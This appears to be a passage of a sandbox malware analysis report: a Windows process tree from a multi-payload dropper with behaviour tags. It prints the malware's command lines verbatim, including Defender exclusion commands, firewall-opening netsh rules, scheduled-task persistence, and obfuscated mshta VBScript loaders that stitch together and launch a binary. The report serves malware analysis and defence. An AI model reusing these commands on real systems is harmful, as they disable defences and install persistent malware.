C:\Users\Admin\Pictures\Adobe Films\IZmycoJU1BUvsJtg9jpdpmxM.exe"C:\Users\Admin\Pictures\Adobe Films\IZmycoJU1BUvsJtg9jpdpmxM.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\4f_pj1ZUCcQZBGvlSheBYq7p.exe"C:\Users\Admin\Pictures\Adobe Films\4f_pj1ZUCcQZBGvlSheBYq7p.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\W6dQhnol2X1JHQB0qLL6rcXv.exe"C:\Users\Admin\Pictures\Adobe Films\W6dQhnol2X1JHQB0qLL6rcXv.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8012 -s 15169⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\dwy8rW6Lldk0o1PoYRnRbG17.exe"C:\Users\Admin\Pictures\Adobe Films\dwy8rW6Lldk0o1PoYRnRbG17.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\QheMslevAL_rz9xfz1g6Ru3F.exe"C:\Users\Admin\Pictures\Adobe Films\QheMslevAL_rz9xfz1g6Ru3F.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "QheMslevAL_rz9xfz1g6Ru3F.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\QheMslevAL_rz9xfz1g6Ru3F.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "QheMslevAL_rz9xfz1g6Ru3F.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\6oTvJ3igZwucenJM0iuuyi70.exe"C:\Users\Admin\Pictures\Adobe Films\6oTvJ3igZwucenJM0iuuyi70.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MCSO9.tmp\6oTvJ3igZwucenJM0iuuyi70.tmp"C:\Users\Admin\AppData\Local\Temp\is-MCSO9.tmp\6oTvJ3igZwucenJM0iuuyi70.tmp" /SL5="$60700,506127,422400,C:\Users\Admin\Pictures\Adobe Films\6oTvJ3igZwucenJM0iuuyi70.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EF7EV.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-EF7EV.tmp\ShareFolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Google\HKGZKXCOFY\foldershare.exe"C:\Program Files\Google\HKGZKXCOFY\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\23-0f575-dac-7c5bc-ff87eda10eba9\SHomaegedaetu.exe"C:\Users\Admin\AppData\Local\Temp\23-0f575-dac-7c5bc-ff87eda10eba9\SHomaegedaetu.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\88-a8f9a-aaa-7b9ae-4f474297c539c\Relycucuka.exe"C:\Users\Admin\AppData\Local\Temp\88-a8f9a-aaa-7b9ae-4f474297c539c\Relycucuka.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3ufui1n.mwt\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\m3ufui1n.mwt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\m3ufui1n.mwt\GcleanerEU.exe /eufive13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fteiij3d.z0t\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\fteiij3d.z0t\installer.exeC:\Users\Admin\AppData\Local\Temp\fteiij3d.z0t\installer.exe /qn CAMPAIGN="654"13⤵
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3jkvabz.u3f\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\s3jkvabz.u3f\any.exeC:\Users\Admin\AppData\Local\Temp\s3jkvabz.u3f\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c01bmoqz.111\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\c01bmoqz.111\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\c01bmoqz.111\gcleaner.exe /mixfive13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gnnb0mnc.upl\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\Pictures\Adobe Films\6nnsooN3RPWOeznJdYnBPSbg.exe"C:\Users\Admin\Pictures\Adobe Films\6nnsooN3RPWOeznJdYnBPSbg.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
C:\Users\Admin\Pictures\Adobe Films\xhH0CSaNzTzyIUn8cKJRVTBQ.exe"C:\Users\Admin\Pictures\Adobe Films\xhH0CSaNzTzyIUn8cKJRVTBQ.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\I2Ef1Cm7naRGD7NIonKfSNUO.exe"C:\Users\Admin\Pictures\Adobe Films\I2Ef1Cm7naRGD7NIonKfSNUO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\TGtAEWLljVxWkvq1xb8Zi2ek.exe"C:\Users\Admin\Pictures\Adobe Films\TGtAEWLljVxWkvq1xb8Zi2ek.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\h7pNaKg1Ramme0ohTtFbfQ3J.exe"C:\Users\Admin\Pictures\Adobe Films\h7pNaKg1Ramme0ohTtFbfQ3J.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue132b1547125d9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue132b1547125d9.exeTue132b1547125d9.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13bbed6e0bb6.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exeTue13bbed6e0bb6.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE( CReaTeOBJEcT ("WscRiPT.SHEll" ). rUn ("C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if """"== """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe"" ) do taskkill -iM ""%~nXv"" /F ", 0, truE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo &if ""== "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe" ) do taskkill -iM "%~nXv" /F7⤵
-
C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE( CReaTeOBJEcT ("WscRiPT.SHEll" ). rUn ("C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if ""/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo ""== """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" ) do taskkill -iM ""%~nXv"" /F ", 0, truE) )9⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo &if "/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo "== "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" ) do taskkill -iM "%~nXv" /F10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIpT:clOsE ( CReaTeobJecT ( "wscRIPT.sHELl" ). ruN( "CmD /q /r Echo | set /p = ""MZ"" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX & stArT msiexec.exe /y .\LEJ9.uX " , 0 ,TRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r Echo | set /p = "MZ" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX&stArT msiexec.exe /y .\LEJ9.uX10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>jo4H.q"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y .\LEJ9.uX11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Tue13bbed6e0bb6.exe" /F8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13a47d89c50.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a47d89c50.exeTue13a47d89c50.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4432 -s 14246⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13530584f2459af.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeTue13530584f2459af.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13a98da3f882e5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a98da3f882e5.exeTue13a98da3f882e5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue136037e6ffe49ce8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exeTue136037e6ffe49ce8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-NDF39.tmp\Tue136037e6ffe49ce8.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDF39.tmp\Tue136037e6ffe49ce8.tmp" /SL5="$202F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe"C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe" /SILENT7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L0DGN.tmp\Tue136037e6ffe49ce8.tmp"C:\Users\Admin\AppData\Local\Temp\is-L0DGN.tmp\Tue136037e6ffe49ce8.tmp" /SL5="$20358,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L2M15.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-L2M15.tmp\postback.exe" ss19⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue132dd525eb51d2.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue132dd525eb51d2.exeTue132dd525eb51d2.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\VDLgOXF_Jx5vVPe7qW4thOVe.exe"C:\Users\Admin\Pictures\Adobe Films\VDLgOXF_Jx5vVPe7qW4thOVe.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\aaaSPc2PtzvTAeDTpwDSd3PG.exe"C:\Users\Admin\Pictures\Adobe Films\aaaSPc2PtzvTAeDTpwDSd3PG.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Users\Admin\Pictures\Adobe Films\bLCqLbeoS1vk6HwFKoG1WPni.exe"C:\Users\Admin\Pictures\Adobe Films\bLCqLbeoS1vk6HwFKoG1WPni.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\mRvJABXCifSAhUTtaxEQl7t8.exe"C:\Users\Admin\Pictures\Adobe Films\mRvJABXCifSAhUTtaxEQl7t8.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\i2CgVIrZifSNZnjq75V_2cUY.exe"C:\Users\Admin\Pictures\Adobe Films\i2CgVIrZifSNZnjq75V_2cUY.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\rMgcMIG5CYTFm8oA7NLdsKUX.exe"C:\Users\Admin\Pictures\Adobe Films\rMgcMIG5CYTFm8oA7NLdsKUX.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\4H4t2AsOcQSAHdHBjitYzETp.exe"C:\Users\Admin\Pictures\Adobe Films\4H4t2AsOcQSAHdHBjitYzETp.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\AFad10bImeuPMYb1rnBi1y1t.exe"C:\Users\Admin\Pictures\Adobe Films\AFad10bImeuPMYb1rnBi1y1t.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\pjzwUtoWYNUgBnf38F7pE4Jn.exe"C:\Users\Admin\Pictures\Adobe Films\pjzwUtoWYNUgBnf38F7pE4Jn.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\8P083V8LTI37jEjio3MwZLjf.exe"C:\Users\Admin\Pictures\Adobe Films\8P083V8LTI37jEjio3MwZLjf.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\M0B7OzUpFvRryaEWM29BOKgd.exe"C:\Users\Admin\Pictures\Adobe Films\M0B7OzUpFvRryaEWM29BOKgd.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\eZsF2OWRzuzNuvlJWHEsjxQF.exe"C:\Users\Admin\Pictures\Adobe Films\eZsF2OWRzuzNuvlJWHEsjxQF.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ByaHAL6bgI2pbhcsOF924P3v.exe"C:\Users\Admin\Pictures\Adobe Films\ByaHAL6bgI2pbhcsOF924P3v.exe"6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\DLjV2s2ueZon3CTM60lS0VWW.exe"C:\Users\Admin\Pictures\Adobe Films\DLjV2s2ueZon3CTM60lS0VWW.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ATcMDXzAEysCGXKAKNWaCcaE.exe"C:\Users\Admin\Pictures\Adobe Films\ATcMDXzAEysCGXKAKNWaCcaE.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Oybdv6qraCYyAyUtgT3A9cef.exe"C:\Users\Admin\Pictures\Adobe Films\Oybdv6qraCYyAyUtgT3A9cef.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\cAnPd9XnYadqGjOKG42BcShO.exe"C:\Users\Admin\Pictures\Adobe Films\cAnPd9XnYadqGjOKG42BcShO.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1424279.exe"C:\Users\Admin\AppData\Roaming\1424279.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8320946.exe"C:\Users\Admin\AppData\Roaming\8320946.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6733372.exe"C:\Users\Admin\AppData\Roaming\6733372.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2694055.exe"C:\Users\Admin\AppData\Roaming\2694055.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\6262846.exe"C:\Users\Admin\AppData\Roaming\6262846.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe" ) do taskkill /Im "%~Nxs" -f8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "KK531TsKmY_gwAkfdeE1FjAt.exe" -f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\NkkVSZW229sS2SE1vtc4j53k.exe"C:\Users\Admin\Pictures\Adobe Films\NkkVSZW229sS2SE1vtc4j53k.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "MKwn4IucqFaGlyJgs5uAGF21.exe" -F9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\7dFCJ8QWIik4RzL943IocouY.exe"C:\Users\Admin\Pictures\Adobe Films\7dFCJ8QWIik4RzL943IocouY.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7fffa0d2dec0,0x7fffa0d2ded0,0x7fffa0d2dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,4780668933732229197,7072907812709929884,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9532_1375310595" --mojo-platform-channel-handle=1696 /prefetch:89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue137fdfa416e28ff.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue137fdfa416e28ff.exeTue137fdfa416e28ff.exe5⤵
- Executes dropped EXE
-
